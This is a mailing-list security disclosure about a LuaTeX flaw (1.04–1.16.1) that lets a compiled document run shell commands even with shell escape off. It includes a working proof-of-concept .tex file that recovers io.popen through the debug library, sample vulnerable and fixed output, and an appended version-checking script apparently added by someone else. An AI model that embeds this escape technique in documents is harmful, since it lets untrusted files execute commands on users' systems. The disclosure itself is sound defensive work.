More info about LuaTeX 1.17.0 (security update)

Max Chernoff mseven at telus.net
Mon May 22 12:31:27 CEST 2023


Hi all,

A few weeks ago, Luigi and the TeX Live team released LuaTeX 1.17.0. In
the announcement email, Karl was initially pretty vague:

> FYI: some issues have been found in luatex (obscure ways to work around
> some security features; thanks to Max Chernoff).  Luigi has committed
> fixes to the sources, and we are rebuilding now. The new luatex version
> is 1.17.0. All four luatex binaries (luatex luahbtex luajitex luajithbtex)
> are affected.

Enough time has passed, so I'll share some more details now.

Through some trickery with the debug module, any document compiled with
older versions of LuaTeX (1.04--1.16.1) can execute arbitrary shell
commands, even with shell escape completely disabled. Vulnerable
versions were included in TeX Live 2017--2023 and MiKTeX 2.9.6300--23.4;
updated versions of TeX Live 2023 and MiKTeX 23.5 include the fixed
1.17.0 version.

Here's a test document:

    % shell-escape-test.tex
    \directlua{
        local function get_upvalue(func, name)
            local nups = debug.getinfo(func).nups

            for i = 1, nups do
                local current, value = debug.getupvalue(func, i)
                if current == name then
                    return value
                end
            end
        end

        local outer = get_upvalue(io.popen, "popen")
        local popen = get_upvalue(outer or io.popen, "io_popen")

        print(popen(arg[rawlen(arg)]):read("*a"))
    }
    \csname@@end\endcsname
    \end

If you're using a vulnerable version of LuaTeX, then the output will
look something like this:

   $ lualatex shell-escape-test.tex "sh -c 'echo @@@VULNERABLE@@@'"
   This is LuaHBTeX, Version 1.16.0 (TeX Live 2023)
   restricted system commands enabled.
   (./shell-escape-test.tex
   LaTeX2e <2022-11-01> patch level 1
   L3 programming layer <2023-04-20>@@@VULNERABLE@@@
   [...]

If you're using a safe/fixed version, then you'll see this:

   $ luatex shell-escape-test.tex "sh -c 'echo @@@VULNERABLE@@@'"
   This is LuaTeX, Version 1.17.0 (TeX Live 2023)
    restricted system commands enabled.
   (./shell-escape-test.tex[\directlua]:1: attempt to call a nil value (local 'popen')
   [...]
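Since the banner line is the quickest way to tell the two cases apart, here is an added inventory check (my own example, not part of Max's post or of LuaTeX) that classifies each of the four LuaTeX binaries by the version in that banner against the 1.04--1.16.1 range stated above. It assumes `luatex --version` prints the same "This is LuaTeX, Version ..." line as its first line of output; the classification itself works on any captured banner string.

```python
import re
import shutil
import subprocess
from typing import Dict, Optional, Tuple

# Range stated in the advisory: LuaTeX 1.04 through 1.16.1 is vulnerable,
# 1.17.0 carries the fix.
VULN_MIN = (1, 4, 0)
VULN_MAX = (1, 16, 1)

# The four binaries named in the TeX Live announcement.
BINARIES = ("luatex", "luahbtex", "luajitex", "luajithbtex")

# Matches "Version 1.16.0 (TeX Live 2023)" as well as two-part "Version 1.04".
BANNER_RE = re.compile(r"Version\s+(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(banner: str) -> Optional[Tuple[int, int, int]]:
    """Return (major, minor, patch) from a LuaTeX banner line, or None."""
    m = BANNER_RE.search(banner)
    if not m:
        return None
    major, minor, patch = m.group(1), m.group(2), m.group(3) or "0"
    return (int(major), int(minor), int(patch))


def classify(banner: str) -> str:
    """Map a banner line to 'vulnerable', 'fixed', 'older' or 'unknown'."""
    v = parse_version(banner)
    if v is None:
        return "unknown"
    if v < VULN_MIN:
        return "older"          # predates the vulnerable range
    if v <= VULN_MAX:
        return "vulnerable"     # 1.04 .. 1.16.1
    return "fixed"              # 1.17.0 or later


def check_installed() -> Dict[str, str]:
    """Run each binary found on PATH with --version and classify its banner."""
    results = {}
    for name in BINARIES:
        path = shutil.which(name)
        if path is None:
            results[name] = "not installed"
            continue
        out = subprocess.run([path, "--version"], capture_output=True, text=True)
        first_line = out.stdout.splitlines()[0] if out.stdout else ""
        results[name] = classify(first_line)
    return results


if __name__ == "__main__":
    for name, status in check_installed().items():
        print(f"{name}: {status}")
```

A machine reporting "vulnerable" for any binary still needs the TeX Live 2023 or MiKTeX 23.5 update even if shell escape is disabled, since that setting does not stop this issue.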

This issue affects all operating systems/architectures, and all LuaTeX
formats except for ConTeXt. Further details are available at:

   https://tug.org/~mseven/luatex.html

Feel free to reply if you have any questions.

Thanks,
-- Max


